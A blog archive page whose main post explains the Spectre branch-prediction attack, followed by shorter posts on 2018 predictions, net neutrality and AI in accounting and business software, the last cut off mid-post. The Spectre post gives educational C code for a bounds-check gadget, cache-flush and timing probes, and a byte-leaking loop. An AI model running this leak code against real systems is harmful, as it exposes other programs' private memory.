Stephen Smith's Blog

Musings on Machine Learning…

Archive for the ‘Business’ Category

Spectre Attacks on ARM Devices


Introduction

I predicted that 2018 would be a very bad year for data breaches and security problems, and we have already started the year with the Intel x86 specific Meltdown exploit and the Spectre exploit that works on all sorts of processors and can even be launched from JavaScript in browsers like Chrome. Since my last article was on Assembler programming, and most of these types of exploits are created in Assembler, I thought it might be fun to look at how Spectre works and get a feel for how hackers can retrieve useful data out of what seems like nowhere. Spectre is actually a large new family of exploits, so patching them all is going to take quite a bit of time, and, like the older buffer overrun exploits, they are going to keep reappearing.

I’ve been writing quite a bit about the Raspberry Pi recently, so is the Raspberry Pi affected by Spectre? After all, it affects all Android and Apple devices based on ARM processors. The main Raspberry Pi operating system is Raspbian, which is a variant of Debian Linux optimized for the Pi. A recent criticism of Raspbian is that it is still 32-Bit. It turns out that running the ARM in 32-bit mode eliminates a lot of the Spectre attack scenarios. We’ll discuss why this is in the article. If you are running 64-Bit software on the Pi (like running Android) then you are susceptible. You are also susceptible to the software versions of this attack, like those in JavaScript engines that use branch prediction (like Chromium’s).

The Spectre hacks work by exploiting how processor branch prediction works, coupled with how data is cached. The exploits use branch prediction to access data they shouldn’t, and then use the processor cache to retrieve the data for use. The original article by the security researchers is really quite good and worth a read. It’s available here. It has an appendix at the back with C code for Intel processors that is quite interesting.

Branch Prediction

In our last blog post we mentioned that all the ARM data processing assembler instructions can be conditionally executed. This matters because if you perform a branch instruction then the instruction pipeline needs to be cleared and restarted, which really stalls the processor. The ARM 32-bit solution was good, as long as compilers are good at generating code that efficiently utilizes these conditional instructions. Remember that most code for ARM processors is compiled using GCC, and GCC is a general purpose compiler that works on all sorts of processors, so its optimizations tend to be general purpose rather than processor specific.

When ARM evaluated adding 64-Bit instructions, they wanted to keep the instructions 32 bits in length, but they also wanted to add a bunch of instructions (like integer divide), so they made the decision to eliminate the bits used for conditionally executing instructions and have a bigger opcode instead (and hence lots more instructions). I think they also considered that their conditional instructions weren’t being used as much as they should be and weren’t earning their keep. Plus they now had more transistors to play with, so they could do a couple of other things instead. One was to lengthen the instruction pipeline to be much longer than the previous three instruction design, and the other was to implement branch prediction. Here the processor keeps a table of 128 branches and the route each took last time through. The processor then speculatively executes the most commonly chosen branch, assuming that once the conditional is figured out, it will very rarely need to throw away the work and start over. Generally this longer pipeline with branch prediction led to much better performance results. So what could go wrong?
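Before getting to that, it’s worth seeing how much branch prediction actually buys. Below is a minimal C demonstration (my own sketch, not from the Spectre paper): summing only the large elements of an array runs much faster when the data is sorted, because then the comparison branch goes the same way for long stretches and the predictor nearly always guesses right. Compile it without aggressive optimization (e.g. gcc -O1), since higher levels may replace the branch with a conditional move and hide the effect.

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

#define N 1000000

/* Sum the elements >= 128. On sorted data the if goes the same way
   for long runs, so the branch predictor wins. On random data it is
   a coin flip and mispredictions pile up. */
static long sum_big(const unsigned char *data, int n) {
    long sum = 0;
    for (int i = 0; i < n; i++)
        if (data[i] >= 128)
            sum += data[i];
    return sum;
}

static int cmp(const void *a, const void *b) {
    return *(const unsigned char *)a - *(const unsigned char *)b;
}

int main(void) {
    static unsigned char data[N];
    for (int i = 0; i < N; i++)
        data[i] = (unsigned char)(rand() % 256);

    clock_t t0 = clock();
    long unsorted = sum_big(data, N);
    clock_t t1 = clock();

    qsort(data, N, 1, cmp);

    clock_t t2 = clock();
    long sorted = sum_big(data, N);
    clock_t t3 = clock();

    printf("unsorted: sum=%ld ticks=%ld\n", unsorted, (long)(t1 - t0));
    printf("sorted:   sum=%ld ticks=%ld\n", sorted, (long)(t3 - t2));
    return 0;
}

The sorted run typically completes several times faster, and the only difference is how predictable the branch is.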

Consider the branch statement:

 

if (x < array1_size)              /* bounds check: normally predicted true */
    y = array2[array1[x] * 256];  /* the *256 spreads each possible secret
                                     byte value onto its own cache line */


This looks like a good bit of C code to test that an index is in range before accessing an array. If it didn’t do this check then we could get a buffer overrun vulnerability by making x larger than the array size and accessing memory beyond the array. Hackers are very good at exploiting buffer overruns. But sadly (for hackers) programmers are getting better at putting these sorts of checks in (or having automated tools or higher level languages do it for them).

Now consider branch prediction. Suppose we execute this code hundreds of times with legitimate values of x. The processor will see that the conditional is usually true and the second line is usually executed. So when this code runs again, branch prediction will just start executing the second line right away and work out the first line in a second execution unit at the same time. But what if we enter a large value of x? Now branch prediction will speculatively execute the second line, and y will get a value derived from memory it shouldn’t have read. But so what? Eventually the conditional in the first line will be evaluated and that value of y will be discarded. Some processors will even zero it out (after all, these designs do get security reviews). So how does that help the hacker? The trick turns out to be exploiting processor caching.

Processor Caching

No matter how fast memory companies claim their super fast DDR4 memory is, it really isn’t, at least compared to CPU registers. To get a bit of extra speed out of memory access, all CPUs implement some sort of memory cache where recently used parts of main memory are cached in the CPU for faster access. Often CPUs have multiple levels of cache: a super fast one, a fast one and a not quite as fast one. The trick to getting at the incorrectly calculated value of y above is to somehow figure out how to access it from the cache. No CPU has a read-from-cache assembler instruction; this would cause havoc and definitely be a security problem. This is really the CPU vulnerability: the incorrectly calculated buffer overrun value is sitting in the cache. Hackers figured out not how to read this value directly, but how to infer it by timing memory accesses. They can clear the cache (flush instructions are generally available, and even if they aren’t, you can evict the cache by reading a large unrelated buffer). Then they time how long it takes to read various bytes. Basically a byte in the cache reads much faster than a byte from main memory, and spotting which of the possible array2 entries is cached reveals the secret value the speculative read used. Very tricky.
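To make the timing side channel concrete, here is a minimal sketch of the flush and probe steps in C for an Intel processor, in the spirit of the code in the paper’s appendix (this is my own illustrative version, not the paper’s code; _mm_clflush and __rdtscp are x86 intrinsics, and the 80-cycle hit threshold is an assumed value you would calibrate per machine):

#include <stdint.h>
#include <x86intrin.h>  /* _mm_clflush, __rdtscp */

#define STRIDE 256      /* matches the *256 in the victim code above */

uint8_t array2[256 * STRIDE];

/* Step 1: flush every probe line of array2 out of the cache. */
void flush_probe_array(void) {
    for (int i = 0; i < 256; i++)
        _mm_clflush(&array2[i * STRIDE]);
}

/* Step 4: time a read of each probe line. The one that comes back
   fast was pulled into the cache by the speculative access, and its
   index is the secret byte. */
int recover_secret_byte(void) {
    unsigned int aux;
    for (int guess = 0; guess < 256; guess++) {
        volatile uint8_t *addr = &array2[guess * STRIDE];
        uint64_t start = __rdtscp(&aux);
        (void)*addr;                        /* the timed read */
        uint64_t elapsed = __rdtscp(&aux) - start;
        if (elapsed < 80)                   /* assumed cache-hit threshold */
            return guess;
    }
    return -1;                              /* nothing cached; try again */
}

Real exploits visit the guesses in a pseudo-random order so the hardware prefetcher doesn’t skew the timings, and retry each byte several times to filter out noise.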

Recap

So to recap, the Spectre exploit works by:

  1. Clear the cache
  2. Execute the target branch code repeatedly with correct values
  3. Execute the target with an incorrect value
  4. Loop through possible values, timing the read access, to find the one in the cache

This can then be put in a loop to read large portions of a program’s private memory.
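Expressed as code, that outer loop might look like the following sketch, reusing the hypothetical flush_probe_array and recover_secret_byte helpers from above (victim_function stands for the bounds-checked branch code from earlier; the training count of 30 is an arbitrary illustrative value):

#include <stddef.h>
#include <stdint.h>

extern void flush_probe_array(void);
extern int recover_secret_byte(void);
extern void victim_function(size_t x);  /* runs the if/array2 code above */
extern uint8_t array1[];
extern size_t array1_size;

/* Read one byte of the victim's memory at the given address. */
uint8_t read_memory_byte(const uint8_t *target) {
    int result = -1;
    while (result < 0) {
        flush_probe_array();                  /* step 1: clear the cache */
        for (int i = 0; i < 30; i++)          /* step 2: train the predictor */
            victim_function(i % array1_size);
        victim_function(target - array1);     /* step 3: out-of-range x, so
                                                 array1[x] is the target byte */
        result = recover_secret_byte();       /* step 4: timing probe */
    }
    return (uint8_t)result;
}

Calling read_memory_byte over a range of addresses then leaks the private memory a byte at a time.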

Summary

The Spectre attack is a very serious new technique for hackers to get at our data. Like buffer overruns, there won’t be one quick fix; people are going to be patching systems for a long time on this one. As more hackers understand this attack, there will be all sorts of creative offshoots that will wreak further havoc.

Some of the remedies, like turning off branch prediction or memory caching, would cause huge performance problems. Generally the real fixes need to be in the CPUs. Beyond this, systems like JavaScript interpreters, the .Net runtime or Java VMs could have this vulnerability in their optimization systems. These can be fixed in software, but now you require a huge number of systems to be patched, and we know from experience that this will take a very long time, with all sorts of bad things happening along the way.

The good news for Raspberry Pi Raspbian users is that the ARM in the older 32-Bit mode isn’t susceptible; it is only susceptible through software implementations of the technique, like those in JavaScript engines. But as hackers develop these techniques going forward, perhaps they will find a combination that works on the Raspberry Pi, so you can never be complacent.

 


Written by smist08

January 5, 2018 at 10:42 pm

Predictions for 2018


Introduction

As 2017 draws to a close, I see a lot of predictions articles for the new year. I’ve never done one before, so what the heck. Predictions articles are notorious for being completely wrong, so take this with a grain of salt. The main problem is that things tend to take much longer than people expect, so sometimes predictions are correct but take ten years instead of one. Then again some predictions are just completely wrong. Some predictions keep reappearing and never come true, like Linux replacing Windows or Microsoft releasing a successful phone. I think most writers find they get a lot of readers on these articles and then no one bothers to check up on them a year later. I’ll assume this is the case and go ahead and make some predictions. Some of these will be more concrete and some will be continuing trends.

Blockchain/Bitcoin

I’m not going to make any predictions on the value of Bitcoin. The more interesting part is the blockchain algorithm behind it, which provides a way to ensure reliable transfers of money in a distributed manner. The real disruption will come when services like credit or debit cards start to be supplanted by blockchain transactions that don’t require any centralized authority. Several big companies like IBM are investing heavily in the infrastructure to support this. Right now credit and debit cards charge very high fees, and many businesses are highly motivated to find an alternate solution. Blockchain offers a ray of hope of removing the transaction charge/tax that exists today on every transaction. I doubt that credit and debit cards will disappear this year, but I do predict that blockchain will start to appear in a number of business to business financial exchanges, perhaps something like Walmart and their suppliers. This will be the start of a long decline for the existing credit and debit card companies unless they innovate and reduce their costs. Right now they are going the route of lobbying governments to make blockchain illegal, but like the music industry protecting CDs, they are fighting an ultimately losing battle.

AI

What we are calling Artificial Intelligence will continue to evolve and become more and more useful. We won’t reach true strong AI this year and the singularity is still a ways off, but the advances are coming quickly, both on the algorithms side and in the hardware to run them on. Will this be the year of the self-driving car? Perhaps in small numbers. We are already seeing self-driving taxis in Singapore and Phoenix. I think we are primed for this to take off big time. Some of the big cost savings will come from self-driving buses, taxis and trucks. However, governments still need to figure out how to alleviate the disruption to the work force this will cause. We will see more and more AI solutions rolled out in sales, inventory replenishment and scientific research. Speech, translation and handwriting recognition systems will continue to get better and better. Predictive systems that suggest movies to watch and music to listen to will keep improving. Products like Alexa and Google Home will become more widespread and their perceived intelligence will improve daily.

Privacy and Security

2017 was a very bad year for data breaches, ransomware attacks, government interference and a general trend toward imposing restrictions on the Internet. 2018 will be worse. We have national security agencies like Russia’s operating with impunity. We have rogue nations like North Korea launching ransomware attacks. We have the removal of Net Neutrality in the USA allowing ISPs and the government to spy on everything you do. Due to the amounts of money involved and a general lack of oversight or prosecution from governments, 2018 will set new records for data breaches, stolen personal information, botnets and ransomware attacks.

DIY

In the early days of personal computers the Apple II and IBM PC were quite open hardware architectures with slots for expansion boards and all sorts of interface capabilities. Software was also open, interfaces were documented (either by the manufacturer or reverse engineers) and you could run any software you liked. Now hardware is all closed with no interface slots and you are often lucky to get a USB port. With many modern devices you can’t even replace the battery.

With the introduction of the $35 Raspberry Pi, DIY and home hardware projects have suddenly had a resurgence. Since the Raspberry Pi runs Linux, you can run any software you like on it (i.e. no regulated App store).

The Raspberry Pi won’t have a refresh until 2019, but in the meantime many companies, seeing an opportunity, are offering similar boards with more memory and other enhancements. In 2018 we’ll see the continuing explosion of Raspberry Pi sales and an explosion of add-ons and DIY projects. All the similar and clone products should also do well and fill some niches that the Pi has ignored.

Low Cost Computers

The Raspberry Pi showed you can make a fully useful computer for $35. Others have noticed, and Microsoft has produced an ARM version of Windows. Now we are seeing small complete computers based on ARM processors being released. Right now they are a bit expensive for what you get, but for 2018 I predict we are going to start seeing fully usable computers for around $200. These will be more functional than the existing x86 based Chromebooks and Netbooks and allow you to run a choice of OSes, including Linux, Android and Windows. I think part of what will make these more successful is that emulation software has gotten much better, so you can run x86 programs on these devices now. Expect to see more RAM than a Pi and SSD drives installed. For laptops, expect quite long battery life.

AR/VR

Augmented Reality and Virtual Reality have received a lot of attention recently, but I think the headsets are still too clunky and these will remain a small niche device through 2018. Popular perhaps in the odd game, not really mainstream yet.

Cloud Migration

People’s cloud migrations will continue. But due to the complexity of hybrid clouds and Infrastructure as a Service (IaaS), many are going to reconsider. Companies will rethink managing their own software installations and just adopt Software as a Service (SaaS). Many companies will move their data centers to the cloud, whether Amazon, Google, Microsoft or another. But they will find this quite complex and quite expensive over time. This will cause them to consider migrating from their purchased, installed applications to true SaaS offerings. Then they don’t have to worry about infrastructure at all. Although IaaS will continue to grow in 2018, SaaS will grow faster. Similarly, at some point in a few years IaaS will reach a maximum and start to slowly decline. The exception will be specialty infrastructures like those with specialized AI processors or GPUs that can perform specific high intensity jobs, but don’t require a continuous subscription.

Summary

Those are my predictions for 2018. Blockchain starting to blossom, security and privacy under greater attack, AI appearing everywhere (and not just marketing material), DIY gaining strength, dramatically lower cost computers, not much in AR/VR and cloud cycling through local data centers to IaaS to SaaS. I guess we can check back next year to see how we did.

 

Merry Christmas and Happy New Year.

 

Written by smist08

December 21, 2017 at 9:55 pm

On Net Neutrality


Introduction

With Ajit Pai and the Republican led FCC removing net neutrality regulations in the USA, there is a lot of debate about what this all means and how it will affect our Internet. Another question is whether other jurisdictions, like here in Canada, will follow suit. The Net Neutrality regulations in the USA were introduced under Barack Obama in 2015 to combat some bad practices by Internet Service Providers (ISPs) that were also cable companies. Namely, they were trying to kill off streaming services like Netflix to preserve their monopoly on TV content via their pay by channel model. Net Neutrality put a stop to that by requiring that all data over the Internet’s pipes be treated equally. Under net neutrality, streaming services blossomed and thrived. Are they now too big to fail? Can new companies have any chance to succeed? Will we all be paying more for basic Internet? Let’s look at the desires of the various players and see what hope we have for the Internet.

Evil Cable Companies

The cable companies want to maintain their cable TV channel business model, where they charge TV channels to be part of their packages and then charge consumers for getting them (plus the consumer pays again by watching commercials). With the Internet, people are going around the cable companies with various streaming services. The cable company charges a flat (high) monthly charge for Internet access, usually based on maximum allowable bandwidth. What the cable companies don’t like is that people are switching in droves to streaming services like Netflix, Amazon Prime or Crave. Like the music companies fighting to save CD sales, they are fighting a losing battle, just pissing off their customers and probably accelerating their decline.

So what do the Cable companies want? They want a number of things. One is to have a mechanism to stifle new technologies and protect their existing business models. This means monitoring what people are doing and then blocking or throttling things they don’t like. Another is to try to make up revenue on the ISP side as cable subscription revenue declines. For this they want more of an App market where you buy or subscribe to bundles of apps to get your Internet access. They see what the cell phone manufacturers are doing and want a piece of that action.

The cable companies know that most people have very limited choices and that if the few big remaining cable and phone companies implement these models then consumers will have no choice but to comply.

Evil Cell Phone Companies

Like the cable companies, the phone companies want to protect their existing business models. To some degree the world has already changed on them, and they no longer make all their money charging for long distance phone calls. Instead they charge rather exorbitant fees for cell phone Internet access. Often, due to mergers, the phone and cable companies are one and the same, so the phone companies often have the same interests as the cable companies. Similarly, without net neutrality the phone companies can start to throttle services they feel compete with their own, like Skype and Facetime. They also want the power to kill any future technologies that threaten them.

Evil Internet Companies

The big Internet companies like Google and Facebook claim they promote net neutrality, but their track record isn’t great. Apple invented the App market, which Google happily embraced for Android. Many feel the App market is as big a threat to the Internet as the loss of Net Neutrality. Instead of using a general Internet browser, the expectation is that you use a collection of Apps on your phone. This adds to the cost of startups, since they need to produce a website and then both an iOS and an Android App for their service. Apps are heavily controlled by the Apple and Google App stores, and Apps that Apple or Google don’t like are removed. This way Apple and Google have very strong control to stifle new innovative companies they feel threatened by. Similarly, companies like Facebook or Netflix have the resources to create lots of Apps for all sorts of platforms, so they aren’t really fighting for Net Neutrality so much as ensuring their apps run on all sorts of TV set top boxes and other device platforms. They don’t mind so much paying extra fees, as this all raises the cost of entry for future competitors.

Evil Government

Why is the government so keen to eliminate Net Neutrality? The main thing is control. Right now the Internet is like the wild west, and they are scared they don’t have sufficient control of it. They want to promote technologies like the deep packet inspection that the ISPs are working on. They would like to be able to act as a man in the middle in secure communications and monitor everything. They would love to be able to remove sites from the Internet. I think many western governments are looking jealously at what China does with its Great Firewall and would love the same control. In the early days of the telephone, the dangers of government abuse were recognized, and that is why laws were put in place requiring search warrants from judges to tap or trace phone calls. Now the government has fought hard to avoid the same oversight on Internet monitoring. They see the removal of Net Neutrality as their opening to work with a few large ISPs to gain much better monitoring and control of the Internet.

The mandate of the government is to provide some corporate oversight to avoid monopolistic abuses of power. They have failed in this by allowing such a large consolidation of ISPs into very few companies and then refusing to regulate or provide any checks and balances over this new monopoly. As long as the government is scared of the Internet and considers it in its best interest to restrict it, things don’t look good.

Pirates and Open Source to the Rescue

So far that looks like a lot of power working to control and regulate the Internet. What are some ways to combat that, especially when there is very little competition among ISPs due to all the mergers that have taken place? Let’s look at a few alternatives.

Competition

Where there is competition, take the time to read reviews and shop around. Often you will get better service with a smaller provider. Even if it costs a bit more, factor in whether you get better privacy and more freedom in your Internet access. Ultimately money drives these decisions, and a consumer revolt can be very powerful. Also beware of multi-year contracts that make it hard to change providers (assuming you actually have a choice).

VPN

In many countries VPNs are already illegal. That could happen in North America, but if it does it will greatly restrict people’s ability to work at home. As long as you can use a VPN you have some freedom and privacy. However, note that most VPNs don’t have the bandwidth for streaming video services, and would likely be throttled if they did.

The Dark Net

Another option is the darknet: setting up Tor nodes and using the Onion browser. The problem here is that it’s too technical for most people and mostly used for criminal enterprises. But if things start to get really bad due to the loss of Net Neutrality, more development will go into these technologies and they could become more widespread.

Peer to Peer

BitTorrent has shown that a completely distributed peer to peer network is extremely hard to disrupt. Governments and major corporations have spent huge amounts of time and money trying to take down BitTorrent sites used to share movies and other digital content. Yet they have failed. It could be that the loss of Net Neutrality will drive more development into these technologies and force a lot of services to abandon the centralized server model of Internet development. After all if your service comes from millions of IP addresses all over the world then how does an ISP throttle that?

Use Browsers not Apps

If you access web sites more from browsers than Apps, then you are helping promote an open and free Internet. If there isn’t an app store involved, it can help keep services available. The good thing is that the core technologies in the Mozilla and WebKit browsers are open source, so creating and maintaining browsers isn’t under the control of a small group of companies. Chromium and Firefox are both really good open source browsers that run on many operating systems and devices.

Summary

Will the loss of Net Neutrality in the USA destroy the Internet? Only time will tell. But I think we will start to see a lot of news stories (if they aren’t censored) over the coming years as the large ISPs start to flex their muscles. We saw the start of this with the throttling of streaming services that caused Net Neutrality to be enacted in the first place, and we’ll see those abuses return fairly quickly.

At least in the western world this sort of bad government decision making can be overridden by elections, but it takes a lot of activism to make changes given the huge amounts of money the cable and phone companies donate to both political parties.

Written by smist08

December 19, 2017 at 7:22 pm

Your New AI Accountant


Introduction

We live in a complex world where we’ve accumulated huge amounts of knowledge. Knowing everything for a profession is getting harder and harder. We have better and better knowledge retrieval programs that let us look up information at our fingertips using natural language queries and Google-like searches. But in fields like medicine and law, sifting through all the results and sorting out what is relevant and important is getting harder and harder. Especially in medicine, there is a lot of bogus and misleading information that can lead to disastrous results. This is a prime application area where Artificial Intelligence and Machine Learning are starting to show some real promise. We have applications like IBM’s Watson successfully diagnosing some quite rare conditions that stumped doctors. We have systems like ROSS that provide AI solutions for law firms.

How about AIs supplementing Accountants? Accountants are very busy and in demand. All the baby boomers are retiring now, and far more Accountants are retiring than are being replaced by young people entering the profession. For many businesses, getting professional business advice from Accountants is becoming a major problem. This affects them properly meeting financial reporting requirements, maintaining legal and regulatory compliance, and generally having a firm, complete understanding of how their business is doing. This article is going to look at how AI can help with this problem. We’ll look at the sort of things that AIs can be trained to do to help perform some of these functions. Of course you will still need an Accountant to provide human oversight and a sanity check, but if things are set up correctly to start with, it will save you a lot of time and money.

Interfaces

If you have an AI with Accounting knowledge, how can it help you? In this section we’ll look at a few ways that the AI system could interact with both the employees of the business and the Business Applications the business uses, like their Accounting or CRM systems.

Chatbots

Chatbots are becoming more common. Here you either type natural language queries to the AI, or talk to it through a voice recognition component. The query processor is connected to the AI, and the AI is then connected to your company’s databases as well as a wealth of professional information on the Internet. These AIs usually have multiple components for voice input, natural language processing, various business areas of expertise, and multiple ways of presenting results.

There have been some notable chatbot failures, like Microsoft’s Twitter Chatbot which quickly became a racist asshole. But we are starting to see some more successful implementations, like Sage’s Pegg or KLM’s Messenger Bot. Plus the general purpose bots like Alexa, Siri and Allo are getting rather good. There are also some really good toolkits, like Amazon Lex, available for developing chatbots, so this becomes easier for more and more developers.

In-program Advice

There have been some terrible examples of in-product advice, such as the best-forgotten Microsoft Clippy. But with advances in User Centered Design, much less intrusive and subtle ways of helping users have emerged. Generally these require good content, so what they present is actually useful, and they have to be unobtrusive, never interfering with someone’s work unless the user wants to pay attention to them. Then when they are used, they can offer to make changes automatically, provide more information, or keep things to a simple one line tip.

If these help technologies are combined with an AI engine, then they can monitor what the user is doing and present application and context based help: suggesting that perhaps a different G/L account should be used here for better Financial Reporting, suggesting that the sales taxes on an invoice should be different due to some local regulations, or making suggestions on additional items that should be added to an Accounting document.

These technologies allow the system to learn from how a company uses the product and to make more useful suggestions, as well as drawing on industry standards that can be incorporated to assist.

Offline Monitoring

In most larger businesses, the person using the Business Application isn’t the one who needs, or can act on, an Accountant’s advice. Most data entry personnel have to follow corporate procedures and would get fired if they changed what they’ve been told to do, even if it’s wrong. Usually the advice has to go to the CFO or someone senior in the Accounting department. In these cases an AI can monitor what is going on in the business and make recommendations to the right person, perhaps seeing how G/L Accounts are being used and sending a recommendation for some changes to facilitate better Financial Reporting or regulatory compliance.

Care has to be taken to keep this functionality clear of other unpopular productivity monitoring software that does things like record people’s keystrokes to monitor when they are working and how fast. Generally this functionality has to stick to improving the business rather than be perceived as big brother snitching on everyone.

Summary

Most small business owners consider Accounting a necessary evil that they are required to do to submit their corporate income tax. They do the minimum required and don’t pay much attention to the results. But as their company grows, their Accounting data can give them great insights into how their business is running. Managing Inventory, A/R and A/P well makes a huge difference to a company’s cash flow and profitability. Correctly and proactively handling regulatory compliance can be a huge time saver and avoid large costs in fines and lawsuits.

It used to be that sophisticated programs to handle these things required huge IT departments and millions of dollars invested in software, and were really only available to large corporations. With the current advances in AI and Machine Learning, many of these sophisticated functions can be integrated into the Business Applications used by all small and medium sized businesses. In fact, in a few years this will be a mandatory feature that users expect in all the software they use.

Written by smist08

July 29, 2017 at 8:42 pm

Making Business Applications Intelligent


Introduction

Today Business Applications tend to be rather boring programs which present the user with complicated forms that need to be filled in with a lot of detail. Accuracy is paramount, and there are a lot of security measures to prevent fraud and theft. Companies need to hire large numbers of people to enter data very repetitively into these forms. With modern User Centered Design these forms have become a bit easier to work with, and they have progressed quite a bit since the original Business Apps on 3270 terminals connected to IBM Mainframes, but I don’t think anyone really considers these applications fun. Necessary and important, yes, but still not many people’s favorite programs.

We’ve been talking a lot about the road to strong AI and we’ve looked at a number of AI tools like TensorFlow, but what about more practical applications that are possible right now? My background is working on ERP software, namely Sage 300/Accpac. In this article I’ll be looking at how we’ll be seeing machine learning/AI algorithms start to be incorporated into standard business applications. A lot of what we will talk about here will be integrated into many applications including things like CRM and Business Analytics.

Many of the ideas I talk about in this article are available today, just not all in the same place. Over the coming years I think we’ll see most of these become standard expected features in every Business Application. Just like we expect modern User Centered Design, tomorrow we will expect intelligent algorithms supporting us behind the scenes in everything we do.

[Diagram: Very high level view of the main components of an intelligent Business Application]

Some Quick Ideas

With Machine Learning and AI algorithms, there could be many small improvements made to Business Applications, major changes in the way things work, all the way up to automating many of the processes that we currently perform manually. Often small improvements can make a huge difference to the lives of current users and are the easiest to implement, so I don’t want to ignore these possibilities on the way to pursuing larger, more ambitious, longer term goals. Perhaps these AI applications aren’t as exciting as self-driving cars or real time speech translation, but they will make a huge difference to business productivity and lead to large cost savings for millions of companies. They will provide real business benefit with better accuracy, better productivity and automated business processes that lead to real cost savings and real revenue boosts.

Better Defaulting of Fields

Currently fields tend to be defaulted based on configuration screens set up by administrators. These defaults might change based on an object like a customer or customer group, but tend to be fairly static. An algorithm could watch what a user (or all the users at a company) tends to use and make much more intelligent defaults. These could be based on the values of other fields, time/date, current promotions, even news feed items. If defaults are provided more intelligently, it will save users huge amounts of data entry time.
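As a flavor of how simple the core of this can be, here is a toy sketch in C (all the names and the fixed-size table are invented for illustration; a real implementation would sit on the application’s database and use much richer context): it just counts which value was picked for a field in each context and suggests the most frequent one.

#include <stdio.h>
#include <string.h>

#define MAX_ENTRIES 1000

/* One (context, value) pair and how often it has been chosen.
   The context might be a customer group, the value a G/L account. */
struct choice {
    char context[32];
    char value[32];
    int  count;
};

static struct choice table[MAX_ENTRIES];
static int entries = 0;

/* Call whenever the user fills in the field. */
void record_choice(const char *context, const char *value) {
    for (int i = 0; i < entries; i++) {
        if (strcmp(table[i].context, context) == 0 &&
            strcmp(table[i].value, value) == 0) {
            table[i].count++;
            return;
        }
    }
    if (entries < MAX_ENTRIES) {
        snprintf(table[entries].context, sizeof table[entries].context, "%s", context);
        snprintf(table[entries].value, sizeof table[entries].value, "%s", value);
        table[entries].count = 1;
        entries++;
    }
}

/* Suggest the most frequently chosen value for this context, or NULL. */
const char *suggest_default(const char *context) {
    int best = -1;
    for (int i = 0; i < entries; i++)
        if (strcmp(table[i].context, context) == 0 &&
            (best < 0 || table[i].count > table[best].count))
            best = i;
    return best >= 0 ? table[best].value : NULL;
}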

Better Auto-Suggestions

Currently auto-suggestions on fields tend to be based on a combination of previously entered values and performing a “Google-like” search on what has been typed so far. Like defaulting, this could be greatly improved with more sophisticated algorithms. The real Google search already does this, but most “Google-like” searches integrated into Business Apps do not. Like defaulting, having auto-suggestions give better, more intelligent recommendations will greatly improve productivity. Just as Google Search uses all your previous searches, trending topics, social media feeds and many other sources, so could your Business Application.
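A sketch of the difference: a plain “Google-like” search just matches the typed prefix, while a smarter one ranks the matches by how often this user actually picked them (names invented; a simple usage count is standing in for a much richer relevance model).

#include <string.h>

/* A candidate completion and how often the user has chosen it. */
struct candidate {
    const char *text;
    int uses;
};

/* Among candidates matching the typed prefix, return the one this
   user has chosen most often, rather than the first alphabetical
   match. Returns NULL if nothing matches. */
const char *best_suggestion(const struct candidate *cands, int n,
                            const char *prefix) {
    const char *best = NULL;
    int best_uses = -1;
    size_t len = strlen(prefix);
    for (int i = 0; i < n; i++) {
        if (strncmp(cands[i].text, prefix, len) == 0 &&
            cands[i].uses > best_uses) {
            best = cands[i].text;
            best_uses = cands[i].uses;
        }
    }
    return best;
}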

Fraud Detection

Credit card companies already use AI to scan people’s credit card purchasing patterns, as well as the patterns of people using stolen credit cards, to flag when they think a credit card has been stolen or compromised. Similarly, Business Applications can monitor various company procedures and expenses to detect theft (perhaps strangeness in Inventory Adjustments) or unusual payments. Here there could be regulatory restrictions on what data can be used; for instance, HR data is probably protected from being incorporated in this sort of analysis. Currently theft and fraud are a huge cost to businesses, and AI could help reduce them. Sometimes just knowing that tools like this are being used can act as a major deterrent.
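One simple statistical building block for this kind of monitoring is flagging transactions that sit far outside the historical pattern. A toy sketch (the three-standard-deviation rule is a common heuristic, not anything from a specific product; real systems use much richer models):

#include <math.h>

/* Flag a new inventory adjustment as suspicious if it lies more than
   three standard deviations from the mean of the historical ones. */
int is_suspicious(const double *history, int n, double new_value) {
    double mean = 0.0, var = 0.0;
    for (int i = 0; i < n; i++)
        mean += history[i];
    mean /= n;
    for (int i = 0; i < n; i++) {
        double d = history[i] - mean;
        var += d * d;
    }
    double sd = sqrt(var / n);
    if (sd == 0.0)
        return new_value != mean;   /* any deviation from a constant history */
    return fabs(new_value - mean) > 3.0 * sd;
}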

Purchasing

Algorithms could be used to better detect when items need reordering while keeping inventory levels down. Further, the algorithms can continuously search vendor prices looking for deals, and consider whether it’s worth buying now at a cheaper price and incurring the inventory expense, or waiting. When you regularly purchase thousands or more items, a dynamic algorithm keeping track of things can really help.
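The classic starting point here is a reorder point calculation; a sketch follows (textbook formula with invented parameter names; the interesting AI part is forecasting daily_demand and deciding whether today’s vendor price justifies buying early):

/* Classic reorder point: reorder when stock on hand (plus stock
   already on order) can't cover expected demand over the lead time
   plus a safety buffer. */
int should_reorder(double on_hand, double on_order,
                   double daily_demand, double lead_time_days,
                   double safety_stock) {
    double reorder_point = daily_demand * lead_time_days + safety_stock;
    return (on_hand + on_order) < reorder_point;
}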

Customer Data

When you get a new customer you need all sorts of information, such as their address, phone number, contacts, etc. Perhaps an algorithm could search the web and fill in this information automatically (a specific example of better defaulting). Plus the AI could scan various web sources (some perhaps pay services for credit ratings and such) to suggest a good credit rating/limit for this new customer. The algorithm could also run in the background and update existing customers as this data changes. Knowing and keeping up to date with your customers is a major challenge for companies with many customers, and much of this work can be automated.

Chasing Accounts Receivables

Collecting money is always a major challenge for every company, and much of this work could be automated. Plus, algorithms can watch the paying habits of customers, to know, say, that a certain customer always pays at the end of the quarter, and not to worry so much when they go over 30 days. But if a customer suddenly gets credit rating problems, or their stock tanks, or there is negative news about the company, then you had better get collecting. Again, this is all a lot of work, and algorithms can greatly reduce the manual workload and make the whole process more efficient.
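A sketch of the “know each customer’s habits” idea (the 15-day grace buffer is an arbitrary illustrative number): instead of chasing every invoice at 30 days, compare how long this invoice has been outstanding to this customer’s own historical average days-to-pay.

/* Chase an invoice only when it is well past this customer's own
   average days-to-pay, rather than a one-size-fits-all 30 days. */
int should_chase(const int *past_days_to_pay, int n, int days_outstanding) {
    double avg = 0.0;
    for (int i = 0; i < n; i++)
        avg += past_days_to_pay[i];
    avg /= n;
    return days_outstanding > avg + 15.0;   /* assumed grace buffer */
}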

Setting Prices

